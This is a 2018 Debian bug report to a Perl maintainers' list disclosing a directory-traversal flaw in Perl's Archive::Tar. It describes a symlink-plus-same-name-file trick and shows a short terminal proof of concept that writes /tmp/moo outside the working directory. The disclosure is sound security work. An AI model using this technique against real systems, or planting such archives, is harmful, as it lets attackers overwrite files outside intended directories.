Bug#900834: perl: Archive::Tar: directory traversal
Jakub Wilk
jwilk at jwilk.net
Tue Jun 5 18:03:33 BST 2018
Source: perl
Version: 5.26.2-5
Tags: security
By default, the Archive::Tar module doesn't allow extracting files
outside the current working directory. However, you can bypass this
secure extraction mode easily by putting a symlink and a regular file
with the same name into the tarball.
I've attached proof of concept tarball, which makes Archive::Tar create
/tmp/moo, regardless of what the current working directory is:
$ tar -tvvf traversal.tar.gz
lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo
-rw-r--r-- root/root 4 2018-06-05 18:55 moo
$ pwd
/home/jwilk
$ ls /tmp/moo
ls: cannot access '/tmp/moo': No such file or directory
$ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
$ ls /tmp/moo
/tmp/moo
--
Jakub Wilk
-------------- next part --------------
A non-text attachment was scrubbed...
Name: traversal.tar.gz
Type: application/gzip
Size: 135 bytes
Desc: not available
URL: <http://alioth-lists.debian.net/pipermail/perl-maintainers/attachments/20180605/b447d04d/attachment.gz>
More information about the Perl-maintainers
mailing list